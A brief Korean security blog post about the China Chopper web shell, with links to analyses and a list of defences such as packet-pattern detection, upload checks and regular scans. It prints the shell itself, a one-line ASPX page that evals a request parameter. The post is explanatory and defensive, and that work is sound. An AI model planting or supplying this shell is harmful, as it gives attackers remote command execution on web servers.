2014년 9월 1일 월요일

China Chopper Web Shell

Example, test.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["memeber"],"unsafe");%>


China Chopper Webshell - the 4KB that Owns your Web Server
http://informationonsecurity.blogspot.kr/2012/11/china-chopper-webshell.html

Breaking Down the China Chopper Web Shell ? Part II
http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

 

- snort 류와 같은 솔루션/장비를 이용한 패킷 패턴 검출
- IIS 에서, .NET 신뢰수준 변경
- 웹사이트 업로드 경로에 허용되지 않은 파일 업로드 체크(코드수준)
- FTP 를 통해서 웹쉘 업로드가 가능하지 않도록 방화벽 제어
- 정기적인 웹쉘 스캔
  ....... 등등등............

 

 


2019년 12월 MS 취약점 패치 주요 사항

서버 관련 주요 중요 취약점 CVE-2019-1470 | Hyper-V 정보 유출 취약성 https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-1470 CVE...